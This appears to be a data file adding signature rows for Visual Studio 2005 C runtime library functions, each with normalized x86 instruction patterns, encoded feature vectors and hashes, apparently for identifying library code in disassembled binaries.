+__pipe,"MOV R32,R32\nPUSH CONST\nSAR R32,CONST\nPOP R32\nMOV R32,DWORD PTR DS:[R32*4]\nAND R32,R32\nMOV BYTE PTR DS:[R32+R32*8+CONST],CONST\nCALL CONST",FaIxVnLoOkWvvYJF+u7ZCfD+dQnZd1cSjuYcv0L41tYAAAAAr72CRY7mHL+7erLD8P51CUL41tYAAAAAxJKmaEL41tYAAAAA0BdCDcSSpmgAAAAA/jq/Qvru2QnQF0INQvjW1gAAAAAAAAAA2XdXEg1JFVh6t2+4DUkVWEL41tYAAAAAJw91EnLoOkUVojFWcug6RY7mHL+7erLDerdvuK+9gkUnD3USu3qyw0L41tYAAAAA,[],d5c19a7d5ad45b492d6d17bdbf02f1534cdb0896,VS2005,LIBC.LIB
+__setdefaultprecision,PUSH CONST\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nRETN,fPWMuwAAAAAAAAAA,8o658QAAAAAAAAAA,40180b2b5e4df097d8ab7d19f59aa1cd9a469d71,VS2005,LIBC.LIB
+__wcsicoll,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,m5BQ/AAAAAAAAAAAWlVPAwAAAAAAAAAAS6l9YE6jm9taVU8DTqOb25uQUPx5TEpveUxKbwAAAAAAAAAA,[],010854c9a70615980991676a2ab529e4ad71faac,VS2005,LIBC.LIB
+__mbschr,"MOVZX R32,R16\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,R32\nNEG R32\nSBB R32,R32\nNOT R32\nAND R32,R32\nPOP EBP",TOT2tSr//scp6uhIOWijNCM8M1BC8G1lKv/+xwAAAAAAAAAAKeroSH6MFX/okgSTXqODJ+j+gdAAAAAAQvBtZQAAAAAAAAAAfowVfyr//sfo/oHQlWb7eme6vA1eo4Mn6JIEk0+LzAqVZvt66P6B0Ezk9rUAAAAAT4vMCgAAAAAAAAAAIzwzUCr//scp6uhIZ7q8DQAAAAAAAAAA,[],91846d5f3ff09c47f906df09bd542a6a1231bd5b,VS2005,LIBC.LIB
+_strncmp,"MOV R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nXOR R32,R32\nREPNE SCAS BYTE PTR ES:[R32]\nNEG R32\nADD R32,R32\nMOV R32,R32",j7U+bibu4WUhh3ljIYd5Y8TZicAxGlDIMRpQyCbu4WUAAAAAJu7hZcTZicAAAAAAxNmJwAAAAAAAAAAAoTjlYsTZicCPtT5u,[],ee69ae0ddd3f012acaff5d034d38ce0994480d02,VS2005,LIBC.LIB
+?terminate@@YAXXZ,PUSH CONST\nCALL CONST\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nPUSH CONST\nCALL CONST,xZyu5ThphBUAAAAAOGmEFdrhmk8AAAAAx8lGiNrhmk8AAAAAxZyu5ThphBUAAAAAUs42lQAAAAAAAAAAx8lGiA1Ev0EAAAAAJAPDnbf8d0QQoXe/OGmEFe40m3MAAAAA2uGaT8fJRojFnK7lx8lGiO40m3MAAAAAEKF3v6q0Ga9OZsUX7jSbc8fJRojFnK7lTmbFFwAAAAAAAAAAqrQZr9EHWnvlsZZO5bGWTqq0Ga/RB1p70Qdae7f8d0QAAAAAxZyu5ThphBUAAAAANRZyE9rhmk8AAAAAt/x3RAAAAAAAAAAA2uGaT8fJRojFnK7lOGmEFY/JO10AAAAAx8lGiI/JO10AAAAA2uGaT8fJRojFnK7lDUS/QTUWchMAAAAAj8k7XSQDw51SzjaVxZyu5ThphBUAAAAAOGmEFQ1Ev0EAAAAA,[],3388c978b7066b653fdc01e78d4a55de8365c6b2,VS2005,LIBC.LIB
+?unexpected@@YAXXZ,PUSH CONST\nCALL CONST\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nPUSH CONST\nCALL CONST,xZyu5ThphBUAAAAAOGmEFdrhmk8AAAAAx8lGiNrhmk8AAAAAUs42lQAAAAAAAAAAJAPDnbf8d0QQoXe/OGmEFe40m3MAAAAA2uGaT8fJRojFnK7lx8lGiO40m3MAAAAAEKF3v6q0Ga9OZsUX7jSbc8fJRojFnK7lTmbFFwAAAAAAAAAAqrQZr9EHWnvlsZZO5bGWTqq0Ga/RB1p7S6l9YDUWchMAAAAA0Qdae7f8d0QAAAAAxZyu5ThphBUAAAAANRZyE9rhmk8AAAAAt/x3RAAAAAAAAAAA2uGaT8fJRojFnK7lOGmEFY/JO10AAAAAx8lGiI/JO10AAAAAj8k7XSQDw51SzjaVxZyu5ThphBUAAAAA,[],301b6f7dfeb947b34e37ac8492bdfc320c15feb1,VS2005,LIBC.LIB
+?_inconsistency@@YAXXZ,PUSH CONST\nCALL CONST\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nPUSH CONST\nCALL CONST,2uGaT8fJRojFnK7lUs42lQAAAAAAAAAA0Qdae7f8d0QAAAAAOGmEFdrhmk8AAAAAx8lGiNrhmk8AAAAAt/x3RAAAAAAAAAAATmbFFwAAAAAAAAAAj8k7XSQDw51SzjaVqrQZr9EHWnvlsZZOxZyu5ThphBUAAAAAxZyu5ThphBUAAAAAJAPDnbf8d0QQoXe/2uGaT8fJRojFnK7l5bGWTqq0Ga/RB1p7OGmEFY/JO10AAAAAEKF3v6q0Ga9OZsUXx8lGiI/JO10AAAAA,[],175c3606de60721c1f7c5c96525396b809cfd773,VS2005,LIBC.LIB
+__mbsdec,"MOVZX R32,BYTE PTR DS:[R32+CONST]\nLEA R32,DWORD PTR DS:[R32+CONST]\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",Us42lQAAAAAAAAAA0Qdae7f8d0QAAAAAuzoiKyQDw51SzjaVTmbFFwAAAAAAAAAAt/x3RAAAAAAAAAAAqrQZr9EHWnvlsZZOJAPDnbf8d0QQoXe/5bGWTqq0Ga/RB1p7EKF3v6q0Ga9OZsUX,[],522ca45413e2d728949ab0d560670da644b0376a,VS2005,LIBC.LIB
+___get_qualified_locale,"ADD R32,CONST\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nCMP R32,R32\nJCC CONST",N9QtU+DpZm4AAAAAwGm2cCbu4WVIlVUm4Olmbibu4WVIlVUmDQwOIDlafGAAAAAA20RVtybu4WXbtEIqSJVVJibu4WW+PZay0r/jI8BptnDLFrJ/TD7C5fwbPGInRqqevj2Wsibu4WVx9C1GJ0aqnvwbPGJe068YssQmnfwbPGInRqqeyxayf0w+wuWyxCadcfQtRibu4WUWOAgiJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAXtOvGHLoOkUnRqqe/Bs8YnLoOkUnRqqelwCtt+NzXxpSaOpbFjgIIhY4CCKR/978kf/e/A0MDiB+Bs9QUmjqW9K/4yPsUhCwJ0aqnnLoOkVy6DpFcug6RTfULVMnRqqe7FIQsONzXxoAAAAAJ0aqnjfULVM31C1TN9QtU+DpZm4AAAAA27RCKjlafGAAAAAAN9QtU+DpZm4AAAAAfgbPUCbu4WXbRFW3FjgIIg0MDiB+Bs9Qcug6RcBptnAnRqqe43NfGsBptnDLFrJ/J0aqnsBptnA31C1T,[],23849ec8a8cf2c231abb8db48c2e4cc922ab771b,VS2005,LIBC.LIB
+__heapadd,"MOV DWORD PTR DS:[0],CONST\nOR R32,CONST\nRETN",Kq+9mQAAAAAAAAAA,[],0231fa5fbc4c74ebc30622c9be8c8d63648bd175,VS2005,LIBC.LIB
+__spawnl,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",UQMHEwAAAAAAAAAA,RIa1AsSSpmjx1sdAc6IZYQAAAAAAAAAAQvjW1gAAAAAAAAAAuZvuqnOiGWEAAAAAxJKmaEL41tYAAAAA8dbHQPQ42DYAAAAAo6qP8X3NIQcAAAAAjEkn8HLoOkUAAAAAcug6RSbu4WVy6DpFfc0hB+ekroJLfz7Wcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNs7M3+RNBNpWHV2wR3LoOkVy6DpFS38+1n3NIQdeo4MnTQTaVnLoOkXFuzruXqODJ4xJJ/AAAAAA56SugnLoOkUAAAAAxbs67nLoOkUAAAAAcug6RfQ42DYSoox5EqKMefQ42DZEhrUCzszf5KOqj/HEkqZocug6RXOiGWG5m+6q,1275c4d1b7faf7955970149b18add0278909293c,VS2005,LIBC.LIB
+_sprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",653N1wAAAAAAAAAA60urhP4HNh43XfGVN13xleudzdcAAAAA/gc2HuudzdcAAAAA,[],34d600e5f74ae7083eb2a057b653e6f1086a194f,VS2005,LIBC.LIB
+_strcat,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",DeHVCwAAAAAAAAAA6FWr2hFkM4Neo4MnXqODJzUpQDIAAAAAK8VrCwAAAAAAAAAAEWQzgzwKGl0AAAAA2D80UAAAAAAAAAAAEWQzgzwKGl0AAAAA92ZeLzwKGl0AAAAAPAoaXQlmNtRcpTmJXKU5idg/NFDKHLxByhy8QVylOYleo4MnXqODJwlmNtQAAAAAK/LdbzUpQDJcpTmJP99g6wlmNtQAAAAACWY21D/fYOvYzQSmXKU5iRFkM4NY2ig6WNooOlylOYk1KUAyEWQzgzwKGl0AAAAANSlAMjUpQDKEcIcd2M0Eptg/NFDYzQSm2M0EpivFawtY2ig6WNooOg3h1QtY2ig6WNooOhuBMI1eo4MnhHCHHfdmXi/YzQSmXqODJz/fYOsAAAAAG4EwjQAAAAAAAAAA2M0EphFkM4PoVava6FWr2hFkM4PoVava,[],eff1931bfa247696974be1895164f4592e45aefc,VS2005,LIBC.LIB
+_strcpy,"MOV R32,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,CONST\nTEST R32,CONST",WNooOhuBMI1eo4MnXKU5idg/NFDKHLxBK8VrCwAAAAAAAAAAq15nETwKGl0AAAAAyhy8QVylOYleo4Mn2D80UAAAAAAAAAAAG4EwjQAAAAAAAAAAXqODJwlmNtQAAAAAXqODJz/fYOsAAAAA2M0EpivFawtY2ig62M0Eptg/NFDYzQSmPAoaXQlmNtRcpTmJDeHVCwAAAAAAAAAAP99g6wlmNtQAAAAACWY21D/fYOvYzQSmWNooOg3h1QtY2ig6,[],269da68a18aef089c623ee69809bb45047be1c3c,VS2005,LIBC.LIB
+__free_osfhnd,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nSHL CONST2,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32",iHmEdImRNI0AAAAA3xPA5Y+3myokA8Od8SrFKI+3myrfE8Dll9p7lIh5hHSX2nuUqI2EHD/DesUAAAAAJAPDnUp0LevkUryfiZE0jT/DesUAAAAAP8N6xQAAAAAAAAAASnQt6z/DesUAAAAA5FK8n6iNhByX2nuUC6oeeY+3myrxKsUol9p7lEp0LeuIeYR0j7ebKj/DesUAAAAAiHmEdImRNI0AAAAA,[],ff49ae6b396edeb6261ba418ef10bed3d304e651,VS2005,LIBC.LIB
+__alloc_osfhnd,"OR DWORD PTR DS:[R32],CONST\nSUB R32,DWORD PTR DS:[R32]\nSAR CONST2,CONST\nADD R32,R32\nMOV R32,R32\nCMP R32,-1\nJCC CONST",XqODJ7kOyqQAAAAAuQ7KpAAAAAAAAAAAcug6RbzfxCqjNXOsdVeQuundF+AnD3USozVzrHLoOkUAAAAAxmv3fTviyDh1V5C66d0X4MZr931eo4Mnk9fRz7zfxCqjNXOsJw91EnyhybDEkqZoVTYmDDviyDh1V5C6cug6RendF+AnD3USxJKmaHLoOkUAAAAAfKHJsLkOyqTp3RfgvN/EKrkOyqQAAAAAO+LIOLkOyqST19HP,[],ae8c59e52b5b9b691bb3f382ea9158850334a611,VS2005,LIBC.LIB
+__open_osfhandle,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nPOP R32\nOR R8,CONST\nSAR R32,CONST",JPTvpNMM6c4AAAAAOVp8YAAAAAAAAAAAu7ZcLNMM6c5KjrHuUnOX2ycPdRJSc5fbXPQ6HDlafGAAAAAAJw91EicPdRJSc5fbSo6x7sRZqjv1t4FR0wzpzsRZqjv1t4FRxFmqOzlafGAAAAAAUnOX23GojMOU/ct19beBUTlafGAAAAAAJw91EnGojMOU/ct1lP3Ldbu2XCxc9DocK9MQNCcPdRJSc5fbu7ZcLLu2XCwk9O+kcaiMw7u2XCxc9Doc,[],467535ab41464cedeef7282b3fba16f141ecc54f,VS2005,LIBC.LIB
+__get_osfhandle,"MOV R32,R32\nAND R32,CONST\nSAR R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nTEST BYTE PTR DS:[R32+R32*8+CONST],CONST\nLEA R32,DWORD PTR DS:[R32+R32*8]\nJCC CONST",wH/MmayQWZEjMzBKrJBZkQAAAAAAAAAAIzMwSqyQWZFZy0pFWctKRQAAAAAAAAAA,[],e72e8e9e6f60f23cf0860346b039d8c917439df3,VS2005,LIBC.LIB
+__set_osfhnd,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nSHL CONST2,CONST\nMOV R32,DWORD PTR DS:[R32]\nCMP DWORD PTR DS:[R32+R32],-1",C6oeeY+3mypeRgIQiHmEdH3uXJgAAAAAiHmEdH3uXJgAAAAATdcdhKf2Rg+7tlwsj7ebKj/DesUAAAAA2mdS+z/DesUAAAAAXkYCEI+3mypN1x2Efe5cmD/DesUAAAAAP8N6xQAAAAAAAAAAp/ZGDz/DesUAAAAAu7ZcLNpnUvuX2nuUl9p7lKf2Rg+IeYR0l9p7lIh5hHSX2nuU,[],8c4951de2240846f3f0f1da2c489ba997d166ece,VS2005,LIBC.LIB
+_wcsxfrm,"PUSH R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nJCC CONST",08q+TAAAAAAAAAAAfbba0wAAAAAAAAAAP8N6xQAAAAAAAAAACsOPltPKvkyXcVGel3FRnn222tMAAAAAHT76Hn222tPyc8HB6XhGlj/DesUAAAAAIYd5Y9PKvky33hhat94YWucFKTbTyr5M5wUpNucFKTbTyr5MqSTq8B0++h7peEaW8nPBwSGHeWMKw4+W,[],1d9599151aa5bd7ccc0f2dc97ca025dfb1b6a431,VS2005,LIBC.LIB
+_wcslen,"MOV R16,WORD PTR DS:[R32]\nINC R32\nINC R32\nTEST R16,R16\nJCC CONST",2BQLuNgUC7jaJOkV2iTpFQAAAAAAAAAAgM1KNtok6RXYFAu4,[],6fdd68a43646f8c76e4c87238a309b85889818f9,VS2005,LIBC.LIB
+__tempnam,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",JUi3VLshlPYYtVGn2M0EppyGUThIgVsDIYd5Y5yGUThIgVsDSIFbA2vrCXfMgyJEGLVRpxIGpRB1JSrKnIZROGvrCXfMgyJEnvidvUj6tOMAAAAAsxKbiy5Vuf5ZFC89zIMiRKb/ndcNDA4guyGU9hIGpRB1JSrKQUXQG0j6tOMAAAAAAhhXX3LoOkUAAAAASPq04wAAAAAAAAAAa+sJd6b/ndcNDA4gEgalEEFF0BvjFm3BDQwOIKYaU74AAAAAWRQvPbshlPYKX6KQpv+d1574nb09ltyHphpTvp74nb09ltyH4xZtwUj6tOMXx0KwCl+ikC5Vuf5ZFC89WRQvPS5Vuf6gNzqhF8dCsNjNBKZKXPt2dSUqykFF0BvjFm3Bcug6RZ74nb09ltyHPZbchwIYV18kA8OdoDc6obshlPYAAAAALlW5/iVIt1RZFC89WRQvPbshlPYlSLdUSlz7diGHeWMAAAAAJAPDnUj6tOMCGFdf,[],77fd3df2f3ac2d7834b12e8ef6b680e5241b9c8f,VS2005,LIBC.LIB
+?set_new_handler@@YAP6AXXZP6AXXZ@Z,"PUSH CONST\nCALL CONST\nPOP R32\nXOR R32,R32\nRETN",4mXuRAAAAAAAAAAAIDiWQAAAAAAAAAAAzSwRpuJl7kQgOJZA,[],07440c01178559d450b363b1f2e293c04040d368,VS2005,LIBC.LIB
+__DllMainCRTStartup@12,"PUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nCMP R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",1yMw4bu2XCxbJznZu7ZcLNIADXtLqX1gIYd5Y9IADXsNzMABcug6Re8PIJG7tlwsqDrmF3LoOkUAAAAAS6l9YOlgt4O1HU880gANe3LoOkVy6DpFnIZROEFF0BtLqX1glJNtbEFF0BsAAAAAWyc52SGHeWMAAAAA7w8gkZyGUTgoXb+rtR1PPA3MwAHpYLeDcug6RUFF0BuoOuYXu7ZcLEFF0BvvDyCRQUXQG7cXn9IAAAAADczAAbcXn9IAAAAAtxef0gAAAAAAAAAA6WC3gyGHeWMAAAAAKF2/q5yGUTgAAAAAu7ZcLEupfWC7tlwsS6l9YEFF0BuUk21s,[],cd13081ef27b9fe552705126fde28d4e6531e874,VS2005,LIBC.LIB
+__CRT_INIT@12,"MOV R32,DWORD PTR DS:[0]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[CONST]\nAND R32,CONST\nSHR DWORD PTR DS:[0],CONST\nMOV DWORD PTR DS:[0],R32\nMOV DWORD PTR DS:[0],R32\nSHL R32,CONST",DczAAfa63KEAAAAAoTW40KWcX4LNIdE+8lsZXg3MwAEaYBxqWFl2n/a63KEAAAAAzSwRpklQlpadghnj9rrcoQAAAAAAAAAAzSHRPlhZdp8AAAAASVCWllhZdp8VojFWnYIZ4/JbGV4AAAAApZxfglhZdp8AAAAAFaIxVg3MwAGhNbjQGmAcalhZdp8AAAAA,[],f7a5e6d1eb30d8b55991a43a374ce750a2b857f0,VS2005,LIBC.LIB
+___init_ctype,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR DS:[0]\nCMP R32,R32\nJCC CONST",92ZeL4/izv0AAAAAj+LO/eLoN1LsNLiKluz4z5RRNiP/UScT/1EnE5RRNiNAnShMj+LO/ZRRNiNAnShMcug6RXrBBquDH2zQQJ0oTHrBBqvvwb+K5R/Dq31RWMMAAAAAgx9s0HLoOkUAAAAAyGEEAyozpIC9hLslTmrDzuUfw6tOasPOesEGq4/izv3i6DdS7dEv4e3RL+F6wQar4ug3UuUfw6sJa5whTmrDzuUfw6uHo219KjOkgE6gi7EAAAAAluz4z+LoN1L3Zl4v78G/iu3RL+F6wQarh6NtfeUfw6u361yCesEGq4/izv2UUTYj7DS4inLoOkUAAAAAvYS7JWLKGXePhtj5t+tcgpoXJLs0Vl2NlFE2Izl2axxkF2a9mhcku5oXJLs0Vl2Nj4bY+eUfw6tiyhl3CWucIU1dDiwAAAAANFZdjeUfw6tpzQYATV0OLE1dDixuPK97ZBdmvVKX7pbBo7Mqbjyve+Ufw6tSy0aIOXZrHFKX7pbBo7MqTqCLsQAAAAAAAAAAac0GAOUfw6vvS8McYsoZd+Ufw6tOasPOwaOzKn1RWMMAAAAA70vDHOLoN1KW7PjPUpfuln1RWMMAAAAAUstGiJRRNiOW7PjPfVFYw06gi7EAAAAA,[],aff56fbd3d828a188c6018e2e9c4d9e0a3432d12,VS2005,LIBC.LIB
+_strxfrm,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",BaVJ2DC5eiwuVbn+gs23oj/DesUAAAAALlW5/jC5eiz6rOdOPGGB5AWlSdgVojFW+qznTj/DesUAAAAAMLl6LD/DesUAAAAAP8N6xQAAAAAAAAAAFaIxVgWlSdiCzbei,[],4217304491bd555a2ea75b4521aafaf0aa6670c6,VS2005,LIBC.LIB
+__rtindfnpop,"FSTP ST\nFLD TBYTE PTR DS:[0]\nCMP BYTE PTR SS:[EBP+CONST],0\nJCC CONST",ncd8h/jrCHaz9wnBs/cJwfjrCHYAAAAA+OsIdgAAAAAAAAAA,[],6ff12c0129b9fab075339cb65b39d35ce01fb9b3,VS2005,LIBC.LIB
+__trandisp1,"MOV R16,CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nFLDCW WORD PTR SS:[EBP+CONST]\nMOV R32,0\nFXAM\nMOV DWORD PTR SS:[EBP+CONST],R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]",owqrM4fwTC4AAAAApGZUJAAAAAAAAAAAJw91EqRmVCSjCqszh/BMLgAAAAAAAAAA,[],5f8c640b35a13a02c84177763f233645faf96817,VS2005,LIBC.LIB
+__rtindfpop,"FSTP ST\nFSTP ST\nFLD TBYTE PTR DS:[0]\nCMP BYTE PTR SS:[EBP+CONST],0\nJCC CONST",+OsIdgAAAAAAAAAAs/cJwfjrCHYAAAAATc6dp/jrCHaz9wnB,[],dabda556ed6a8ba3b8c77d8119e45de054b59a91,VS2005,LIBC.LIB
+__rtzeropop,FSTP ST\nFSTP ST\nFLDZ\nRETN,XXYzDAAAAAAAAAAA,[],9d260061978fcf60c5bc0fa5f6a2633e13cbc3a6,VS2005,LIBC.LIB
+__rttosnpopde,"MOV BYTE PTR SS:[EBP+CONST],CONST\nOR R8,R8\nRETN",r5LkeAAAAAAAAAAA,[],9952aee67aefd316e7bf8866ac76e04306da0f1e,VS2005,LIBC.LIB
+__rtonepop,FSTP ST\nFSTP ST\nFLD1\nRETN,XXYzDAAAAAAAAAAA,[],d4bf35a9d95f0870a8dfc495c0f4f53dec16424f,VS2005,LIBC.LIB
+__rtnospopde,INT3\nINT3\nINT3\nCALL CONST\nJMP SHORT CONST,0l9AMtJfQDIAAAAAN9QtU9JfQDIAAAAA,[],34daf69af536436575aae6ddf41edb10f5fcd13d,VS2005,LIBC.LIB
+__rttospop,FSTP ST\nRETN,l6nKSu53GNMAAAAA7ncY0wAAAAAAAAAA,[],f57e5e79508c9935dc1f3ca970746b4a22bd3956,VS2005,LIBC.LIB
+__rttosnpop,RETN,AaF1swAAAAAAAAAA,[],8bf7b464aaa2c2b536aa1d76a1297c19155f5603,VS2005,LIBC.LIB
+__tosnan1,"FSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",SJv5BAAAAAAAAAAAfLAGUQAAAAAAAAAA/tzXO0ib+QR8sAZR,[],52081b043556d03c756cac133b1ba92523a81edf,VS2005,LIBC.LIB
+__rtnospop,FSTP ST\nRETN,7ncY0wAAAAAAAAAA,[],59760fe85545571e02f1c89c05c3693bed7d9f6b,VS2005,LIBC.LIB
+__trandisp2,"MOV WORD PTR SS:[EBP+CONST],R16\nFLDCW WORD PTR SS:[EBP+CONST]\nMOV R32,0\nFXAM\nMOV DWORD PTR SS:[EBP+CONST],R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nMOV BYTE PTR SS:[EBP+CONST],0",/993+JOtbgIAAAAAJw91Ev/fd/ijCqszk61uAgAAAAAAAAAAowqrM5OtbgIAAAAA,[],2d4dc2c6282be25717209d31fa07da37fc10c6f1,VS2005,LIBC.LIB
+__nosnan2,"FXCH ST(1)\nFSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",s/cJwe53GNMAAAAAI7Lwxe53GNMAAAAA7ncY0wAAAAAAAAAAI+8kvbP3CcEjsvDF,[],72a89e436659b03a0d0da8e6271739ab51bea85b,VS2005,LIBC.LIB
+__rtchsifneg,"OR R8,R8\nJCC CONST",l6nKSgGhdbMAAAAAAaF1swAAAAAAAAAA2M0EpgGhdbOXqcpK,[],a9ac73328e1d4d6d5bb5059cdcc95da37514407b,VS2005,LIBC.LIB
+__rttospopde,CALL CONST\nFXCH ST(1)\nFSTP ST\nRETN,WNn+qAAAAAAAAAAA,r5LkeAAAAAAAAAAA,b434352a9e71ad6dbc9f7ca0b026e319a3425c00,VS2005,LIBC.LIB
+__nan2,"FXCH ST(1)\nFSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",s/cJwe53GNMAAAAAI+8kvbP3CcEjsvDFI7Lwxe53GNMAAAAA/tzXO7P3CcEj7yS97ncY0wAAAAAAAAAA,[],e8a4770d9723db57939a6c1c177fc22373a679a5,VS2005,LIBC.LIB
+__rtonenpop,FSTP ST\nFLD1\nRETN,sPZ2lgAAAAAAAAAA,[],8cf49096853de49371538144368d01e3c67e0b63,VS2005,LIBC.LIB
+__rtzeronpop,FSTP ST\nFLDZ\nRETN,sPZ2lgAAAAAAAAAA,[],b7795232b85d8c5693bdffbba2b10dca238d91f8,VS2005,LIBC.LIB
+__tosnan2,"FSTP TBYTE PTR SS:[EBP+CONST]\nFLD TBYTE PTR SS:[EBP+CONST]\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",/tzXO+YS6eQjsvDFI7Lwxe53GNMAAAAA5hLp5AAAAAAAAAAA7ncY0wAAAAAAAAAA,[],a34bdead4358f71d8ad79d8a99bf7422eefbb145,VS2005,LIBC.LIB
+__EH_prolog,"PUSH -1\nPUSH R32\nMOV R32,DWORD PTR FS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR FS:[0],ESP\nMOV DWORD PTR SS:[ESP+CONST],EBP\nLEA EBP,DWORD PTR SS:[ESP+CONST]",nP/37gAAAAAAAAAA,[],08a5bfe4656c57358b211d71178753df37b4e9d4,VS2005,LIBC.LIB
+__wchdir,"PUSH R32\nMOV WORD PTR SS:[EBP+CONST],CONST\nCALL CONST\nAND WORD PTR SS:[EBP+CONST],0\nMOV WORD PTR SS:[EBP+CONST],R16\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",rN+z5gAAAAAAAAAA6jKEuC/8ATViQijVnKUuTQAAAAAAAAAAYkIo1azfs+Yv/AE1J2IC+JylLk3f9buML/wBNZylLk2s37PmbYlwbmJCKNXqMoS43/W7jJylLk1tiXBu,[],0f33f222425e63c3d483a67106b2118ee7e20697,VS2005,LIBC.LIB
+_wcsspn,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R16,WORD PTR DS:[R32]\nTEST R16,R16\nJCC CONST",nsgjtOBfva7VmwPEcLYC5OBfva4AAAAA4F+9rp7II7Qm7uFl1ZsDxAAAAAAAAAAAJu7hZYz41XgAAAAAjPjVeNWbA8SeyCO0M1v7MNWbA8RwtgLknsgjtIz41XieyCO0,[],fb32568039f8e2c80938baec812ff56809064850,VS2005,LIBC.LIB
+__safe_fprem1,CALL CONST\nRETN,aNbbxwAAAAAAAAAA,6Vhh6zplNTwdnEWuOmU1PAAAAAAAAAAAHZxFrjplNTwAAAAA,a210fb1578c63f75a727ccb3e30e5e4aab52c130,VS2005,LIBC.LIB
+__adj_fdiv_m32i,"FXCH ST(1)\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP]\nFILD DWORD PTR SS:[ESP+CONST]\nCALL CONST\nFLD TBYTE PTR SS:[ESP]\nFXCH ST(1)\nADD ESP,CONST",w9mv3AAAAAAAAAAAGZUUxMPZr9zKmDbXypg21wAAAAAAAAAA,[],bed04218dd6abd7a130bf663bf48e935bf7efa2f,VS2005,LIBC.LIB
+__safe_fdivr,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nCALL CONST\nADD ESP,CONST\nPOP R32\nRETN",HHWumwAAAAAAAAAA,kCisEwAAAAAAAAAA,6d3d87720aae26e7ecfe3afa37cc4f9f8635ff6c,VS2005,LIBC.LIB
+__adj_fprem,"PUSH R32\nSUB ESP,CONST\nFSTP TBYTE PTR SS:[ESP+CONST]\nFSTP TBYTE PTR SS:[ESP]\nXOR R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,CONST\nJCC CONST",B5saMYEAgZ4CU+HPL/g88gAAAAAAAAAAqgHO6gAAAAAAAAAAgQCBngAAAAAAAAAArVm0/o1wE7+qAc7qjXATvy88BcwHmxoxAlPhzy/4PPIAAAAALzwFzAAAAAAAAAAA,[],a22c39c3ad399df8241928c5d3c50daf3a78e882,VS2005,LIBC.LIB
